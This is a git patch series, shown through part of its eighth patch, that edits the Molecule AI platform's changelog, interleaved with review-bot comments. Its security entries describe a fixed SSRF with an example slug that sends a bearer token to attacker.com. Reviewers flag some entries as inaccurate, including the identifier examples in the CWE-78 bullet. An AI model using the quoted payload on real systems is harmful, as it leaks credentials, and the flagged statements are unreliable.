From ab799e93b30d42b3a6e04c1c1720d08ee8a7522b Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 04:16:10 +0000 Subject: [PATCH 01/15] docs(changelog): add 2026-05-16 + backfill 2026-05-14 and 2026-05-15 entries MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 2026-05-16: - Fix: Hermes workspace MCP server tools now reach agent loop (#22) - Internal: Files API groundwork (molecule-core#1247/#1255/#1257/#1267) - Internal: Scripts CI improvements (internal#431/#437) 2026-05-15: Quiet day — docs queue maintenance (#40-49 open) 2026-05-14: - Security: OFFSEC-006 tenant slug SSRF fix (#933) - Fix: Canvas accessibility round 3 (#936, #949) - Internal: CI/CD hardening + test coverage Supersedes open docs#50 (2026-05-15 quiet-day entry). 🤖 Generated by Documentation Specialist daily-changelog cron. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 40 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 0717703..e1b4983 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx
@@ -8,6 +8,46 @@ Entries are published daily at 23:50 UTC. --- +## 2026-05-16 + +### ๐Ÿ”ง Fixes + +- **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) + +### ๐Ÿงน Internal + +- **Platform Files API groundwork** (`molecule-core`): Phase 1โ€“3 of the Files API roots RFC (`internal#425`) landed across four PRs โ€” the `secrets` package now has a canonical credential-shape regex SSOT (`#1255`); the FilesTab canvas component gains an `/agent-home` root option and a secret-shape denial placeholder (`#1257`); the API gains a stub `allowedRoots` key with a 501 short-circuit (`#1247`); and the handler test suite was hardened to prevent data races during `db.DB` swap (`#1267`). These are infrastructure PRs that enable future per-container home directory isolation โ€” the `/agent-home` root will be documented when the API ships. +- **Scripts CI improvements** (`internal`): SOP tier-check now tolerates empty/invalid tokens while the token is being provisioned (`internal#431`); the `continue-on-error` guard on the PR-body gate is disabled when the runner backlog is draining to avoid silent pass (`internal#437`). + +--- + +## 2026-05-15 + +No customer-visible changes. All activity was internal infrastructure and SOP tooling. 
+ +### ๐Ÿงน Internal + +- **Docs queue maintenance**: self-hosted Docker deployment guide, workspace ability flags (`broadcast_enabled` / `talk_to_user_enabled`) API reference, MCP server `broadcast_message` tool, CWE-78 `expandWithEnv` regression fix, OFFSEC-006 SSRF advisory, and OFFSEC-003 boundary-escaping fix all prepared in open pull requests โ€” pending CI clearance and merge. (`docs` [#40](https://git.moleculesai.app/molecule-ai/docs/pulls/40)โ€“[#49](https://git.moleculesai.app/molecule-ai/docs/pulls/49)) + +--- + +## 2026-05-14 + +### ๐Ÿ”’ Security + +- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call, and disables glob expansion of metacharacters with `set -f`. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) + +### ๐Ÿ”ง Fixes + +- **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, and other canvas components. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949)) + +### ๐Ÿงน Internal + +- **CI/CD hardening** (`molecule-core`): publish workflow Docker healthcheck made pipefail-safe (`#952`); `sop-checklist` gate renamed from `sop-checklist-gate` (`#951`); `continue-on-error` flipped to `false` on platform-build CI (`#935`); `GITHUB_EVENT_BEFORE` fallback corrected (`#937`); publish deploy images on every main push enabled (`#939`). 
+- **Test coverage additions** (`molecule-core`): OFFSEC-003 test assertions corrected for ZWSP-escaped values (`#946`); `executeDelegation` integration test calls updated (`#945`); unit tests added for `walkOrgWorkspaceNames` and `resolveParentOrgID` (`#941`). + +--- + ## 2026-05-12 ### ๐Ÿ”’ Security -- 2.52.0 From ba8ec52ca991de121d0ebf704d2f7ecce5d52d3a Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 10:15:36 +0000 Subject: [PATCH 02/15] docs(changelog): add hermes#23 bearer token 401 fix to 2026-05-16 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit molecule-ai-workspace-template-hermes#23: CONFIGS_DIR fix so molecule MCP server finds the bearer token at /configs/.auth_token. ๐Ÿค– Generated by Documentation Specialist cross-repo PR watch. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index e1b4983..a5a1536 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -13,6 +13,7 @@ Entries are published daily at 23:50 UTC. ### ๐Ÿ”ง Fixes - **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) +- **Hermes workspace bearer token 401 on MCP tool calls fixed**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message, even though the correct bearer was present on disk at `/configs/.auth_token`. The root cause was that `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file. The `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory, allowing the MCP server to find the bearer token at startup. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)) ### ๐Ÿงน Internal -- 2.52.0 From 2c85205ee7a7becd5bcf00da60949128695a92d7 Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 13:09:33 +0000 Subject: [PATCH 03/15] fix(changelog): remove inaccurate set -f clause from OFFSEC-006 entry The set -f clause was not part of the actual fix (validate_slug() RFC-1123 regex only). Technical-writer review identified the inaccuracy. Removes the clause per docs#51 REQUEST_CHANGES. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index a5a1536..54944e7 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -36,7 +36,7 @@ No customer-visible changes. All activity was internal infrastructure and SOP to ### ๐Ÿ”’ Security -- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call, and disables glob expansion of metacharacters with `set -f`. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) +- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) ### ๐Ÿ”ง Fixes -- 2.52.0 From d14dccdd442f8ac9a6a903c1bb3e0dcbc101f5b3 Mon Sep 17 00:00:00 2001 
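Review bot: in [PATCH 01/15], the OFFSEC-006 entry under 2026-05-14 credits two mechanisms, `validate_slug()` and `set -f`, but [PATCH 03/15] in this same series deletes the `set -f` clause as inaccurate. Check the entry against `molecule-core` #933 before it lands instead of correcting it two commits later; squashing 03 into 01 keeps the wrong statement out of history. In the same hunk, the 2026-05-16 Internal bullet says the SOP tier-check "now tolerates empty/invalid tokens while the token is being provisioned" without saying what the check does in that case; for a gate, state whether it skips, warns, or fails closed.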
From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 13:38:28 +0000 Subject: [PATCH 04/15] docs(changelog): fold docs#45 unique entries into 2026-05-14 section MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Adds CWE-78 (expandWithEnv POSIX-identifier guard regression), OFFSEC-003 workspace-side A2A boundary marker escaping, OpenClaw template models config fix, CI infrastructure improvements, and handler test coverage additions from docs#45 — consolidating all 2026-05-14 content into docs#51 so docs#45 can be closed. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 54944e7..e71e0eb 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx
@@ -37,15 +37,20 @@ No customer-visible changes. All activity was internal infrastructure and SOP to ### ๐Ÿ”’ Security - **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) +- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: shell-identifier guard at `org_helpers.go:82` was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables โ€” blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) +- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization โ€” so injection of the raw closer cannot be retroactively re-added by the sanitization pass. 
Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073)) ### ๐Ÿ”ง Fixes - **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, and other canvas components. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949)) +- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers โ†’ a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4)) ### ๐Ÿงน Internal - **CI/CD hardening** (`molecule-core`): publish workflow Docker healthcheck made pipefail-safe (`#952`); `sop-checklist` gate renamed from `sop-checklist-gate` (`#951`); `continue-on-error` flipped to `false` on platform-build CI (`#935`); `GITHUB_EVENT_BEFORE` fallback corrected (`#937`); publish deploy images on every main push enabled (`#939`). - **Test coverage additions** (`molecule-core`): OFFSEC-003 test assertions corrected for ZWSP-escaped values (`#946`); `executeDelegation` integration test calls updated (`#945`); unit tests added for `walkOrgWorkspaceNames` and `resolveParentOrgID` (`#941`). 
+- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035)) +- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999)) --- -- 2.52.0 From a56d2afe571fb91ec91b1fb5f0473a21e811f7ac Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 13:56:30 +0000 Subject: [PATCH 05/15] fix(changelog): trim duplicates per TW re-review Removes 2026-05-15 section (docs#49 is canonical) and all 2026-05-14 entries that duplicate docs#49 (OFFSEC-006, CWE-78, OFFSEC-003) and docs#45 (Canvas WCAG, OpenClaw, CI improvements, handler coverage). Keeps only the 2026-05-16 section with unique Hermes MCP + Files API + Scripts CI content. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 32 -------------------------------- 1 file changed, 32 deletions(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index e71e0eb..00abcf8 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -22,38 +22,6 @@ Entries are published daily at 23:50 UTC. --- -## 2026-05-15 - -No customer-visible changes. All activity was internal infrastructure and SOP tooling. - -### ๐Ÿงน Internal - -- **Docs queue maintenance**: self-hosted Docker deployment guide, workspace ability flags (`broadcast_enabled` / `talk_to_user_enabled`) API reference, MCP server `broadcast_message` tool, CWE-78 `expandWithEnv` regression fix, OFFSEC-006 SSRF advisory, and OFFSEC-003 boundary-escaping fix all prepared in open pull requests โ€” pending CI clearance and merge. (`docs` [#40](https://git.moleculesai.app/molecule-ai/docs/pulls/40)โ€“[#49](https://git.moleculesai.app/molecule-ai/docs/pulls/49)) - ---- - -## 2026-05-14 - -### ๐Ÿ”’ Security - -- **OFFSEC-006: tenant slug SSRF + token exfiltration in `promote-tenant-image.sh` fixed**: tenant slugs were interpolated into URL paths without sanitisation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could trigger SSRF or exfiltrate the platform bearer token. The fix adds RFC-1123 slug validation (`validate_slug()`) that rejects any slug not matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$` before any network call. (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) -- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: shell-identifier guard at `org_helpers.go:82` was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables โ€” blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). 
(`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) -- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization โ€” so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073)) - -### ๐Ÿ”ง Fixes - -- **Canvas accessibility round 3**: WCAG AA contrast fixes, focus-visible rings, and ARIA attribute corrections applied across `ConversationTraceModal`, `ErrorBoundary`, `ExternalConnectModal`, `MissingKeysModal`, `ProviderModelSelector`, and other canvas components. (`molecule-core` [#936](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/936), [#949](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/949)) -- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers โ†’ a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. 
(`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4)) - -### ๐Ÿงน Internal - -- **CI/CD hardening** (`molecule-core`): publish workflow Docker healthcheck made pipefail-safe (`#952`); `sop-checklist` gate renamed from `sop-checklist-gate` (`#951`); `continue-on-error` flipped to `false` on platform-build CI (`#935`); `GITHUB_EVENT_BEFORE` fallback corrected (`#937`); publish deploy images on every main push enabled (`#939`). -- **Test coverage additions** (`molecule-core`): OFFSEC-003 test assertions corrected for ZWSP-escaped values (`#946`); `executeDelegation` integration test calls updated (`#945`); unit tests added for `walkOrgWorkspaceNames` and `resolveParentOrgID` (`#941`). -- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035)) -- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999)) - ---- - ## 2026-05-12 ### ๐Ÿ”’ Security -- 2.52.0 From d1545857f494a7d6b5c804a82be0071f9de9d240 Mon Sep 17 00:00:00 2001 
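Review bot: in [PATCH 04/15], the CWE-78 bullet gives `${HOME}`, `${DOCKER_HOST}` and `${AWS_SECRET_ACCESS_KEY}` as examples of "invalid shell identifiers", but all three are valid POSIX identifiers, while the regression cases listed in the same bullet (`${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`) are the invalid ones. As written, a reader cannot tell whether the guard blocks expansion of sensitive host variables or only rejects malformed names; say which, and choose examples that match. In the OFFSEC-003 bullet, "injection of the raw closer cannot be retroactively re-added by the sanitization pass" does not parse; something like "so the sanitization pass cannot reintroduce the raw closer" would read correctly if that is the intent.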
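Review bot: [PATCH 05/15] deletes the 2026-05-15 section and the whole 2026-05-14 section on the grounds that docs#49 and docs#45 carry them, yet the commit message of [PATCH 04/15] says the docs#45 content was folded in here "so docs#45 can be closed". If docs#45 is closed on that basis, the entries this patch attributes to docs#45 (Canvas WCAG, OpenClaw, CI improvements, handler coverage) are left in no open PR. Confirm which PR is canonical for each entry before merging and record it in the commit message. Patches 01, 04 and 05 also net out to no change for these two sections and could be squashed.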
From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 14:22:19 +0000 Subject: [PATCH 06/15] docs(changelog): add molecule-core#1327 platform-side bearer-token fix The hermes#23 bearer-token 401 was a two-part issue: workspace-side CONFIGS_DIR fix (already documented) and platform-side token-injection ownership fix (molecule-core#1327). Adds the platform-side fix to the same 2026-05-16 entry. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 00abcf8..403ffa6 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -13,7 +13,7 @@ Entries are published daily at 23:50 UTC. ### ๐Ÿ”ง Fixes - **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) -- **Hermes workspace bearer token 401 on MCP tool calls fixed**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message, even though the correct bearer was present on disk at `/configs/.auth_token`. The root cause was that `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file. The `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory, allowing the MCP server to find the bearer token at startup. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)) +- **Hermes workspace bearer token 401 on MCP tool calls fixed (two-part fix)**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message. Two independent root causes were identified and fixed: (1) workspace side โ€” `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file at `/configs/.auth_token`. `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory. 
(`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)); (2) platform side โ€” two workspace-server token-injection paths were writing `/configs/.auth_token` and `/configs/.platform_inbound_secret` as `root:root` after the template entrypoint's `chown -R agent:agent /configs` had already run. Since the MCP server runs as agent uid 1000 (via `gosu agent`), `platform_auth.get_token()` hit `Permission denied` โ†’ empty bearer โ†’ 401. Both injection paths now stamp token files as uid/gid 1000 (agent) instead of root. (`molecule-core` [#1327](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1327)) ### ๐Ÿงน Internal -- 2.52.0 From f9ac456c4dc849c6aed52626ae681163b53bff9e Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 14:23:43 +0000 Subject: [PATCH 07/15] docs(changelog): add claude-code#24 Kimi K2.6 routing to 2026-05-16 Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 403ffa6..6cbdde3 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -14,6 +14,7 @@ Entries are published daily at 23:50 UTC. - **Hermes workspace MCP server tools now reach the agent loop**: the `molecule-ai/mcp-server` process was starting correctly on `127.0.0.1:9100` and the `/mcp` route was verified working (JSON-RPC `initialize` returned 12 tools), but the Hermes agent was not calling platform tools because `MOLECULE_MCP_SERVER_URL` was not wired into the Hermes `config.yaml`. The `start.sh` now sets `MOLECULE_MCP_SERVER_URL=http://localhost:9100` at startup, and the agent loop correctly connects. (`molecule-ai-workspace-template-hermes` [#22](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/22)) - **Hermes workspace bearer token 401 on MCP tool calls fixed (two-part fix)**: a fresh Hermes workspace was returning HTTP 401 on every `list_peers` and A2A MCP tool call with the canned *"bearer token may be invalid"* message. Two independent root causes were identified and fixed: (1) workspace side โ€” `CONFIGS_DIR` was not set in the agent environment, so the molecule MCP server could not locate the token file at `/configs/.auth_token`. `start.sh` now sets `CONFIGS_DIR=/configs` and ensures the agent owns the `/configs` directory. (`molecule-ai-workspace-template-hermes` [#23](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-hermes/pulls/23)); (2) platform side โ€” two workspace-server token-injection paths were writing `/configs/.auth_token` and `/configs/.platform_inbound_secret` as `root:root` after the template entrypoint's `chown -R agent:agent /configs` had already run. Since the MCP server runs as agent uid 1000 (via `gosu agent`), `platform_auth.get_token()` hit `Permission denied` โ†’ empty bearer โ†’ 401. Both injection paths now stamp token files as uid/gid 1000 (agent) instead of root. 
(`molecule-core` [#1327](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1327)) +- **Claude Code template Kimi K2.6 model routed to official `api.kimi.com/coding` endpoint**: the Claude Code workspace template's adapter now correctly routes `Kimi K2.6` to the official Kimi coding endpoint (`api.kimi.com/coding`) instead of the default Anthropic-compatible endpoint, per Kimi's official API specification. (`molecule-ai-workspace-template-claude-code` [#24](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-claude-code/pulls/24)) ### ๐Ÿงน Internal -- 2.52.0 From 48f20174a67e1b010ae9c2672b6f8dce23216123 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Sat, 16 May 2026 14:40:16 +0000 Subject: [PATCH 08/15] =?UTF-8?q?docs(changelog):=20add=202026-05-17=20ent?= =?UTF-8?q?ry=20=E2=80=94=20OpenClaw=20template=20adapter=20fixes?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Covers openclaw#18 (unroutable model default coercion), openclaw#14+#17 (Minimax + Kimi-For-Coding key routing), and openclaw#16 (molecule A2A MCP server registration with OpenClaw). Cross-links to the 2026-05-16 section for the Hermes + bearer-token fixes documented in docs#51. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 6cbdde3..fa57d7e 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx 
@@ -8,6 +8,18 @@ Entries are published daily at 23:50 UTC. --- +## 2026-05-17 + +### ๐Ÿ”ง Fixes + +- **OpenClaw template adapter routing: fresh provisions now serve correctly**: OpenClaw workspace provisions were failing immediately after launch โ€” the adapter had no routing path for the default model, causing every new workspace to be non-functional on first boot. The adapter now coerces an unroutable model to a known-good default, ensuring new OpenClaw workspaces are immediately usable without manual configuration. (`molecule-ai-workspace-template-openclaw` [#18](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/18)) +- **OpenClaw template MiniMax and Kimi-For-Coding API keys routed to correct endpoints**: the OpenClaw adapter was routing all Minimax (`sk-cp-*` keys) and Kimi-For-Coding (`sk-kimi-*` keys) API calls to the wrong endpoints, causing HTTP 401 errors on every chat turn. Minimax calls now route to the Anthropic-compatible gateway; Kimi-For-Coding calls route via Moonshot's Anthropic-compat endpoint, mirroring the existing MiniMax fix. (`molecule-ai-workspace-template-openclaw` [#14](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/14), [#17](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/17)) +- **OpenClaw template now shows molecule platform peers**: OpenClaw workspaces were not returning molecule platform peers in `list_peers` responses โ€” the model was answering via its own native `sessions_list` instead of querying the molecule A2A registry. The adapter now correctly registers the molecule A2A MCP server, so `list_peers` returns platform peers as expected. 
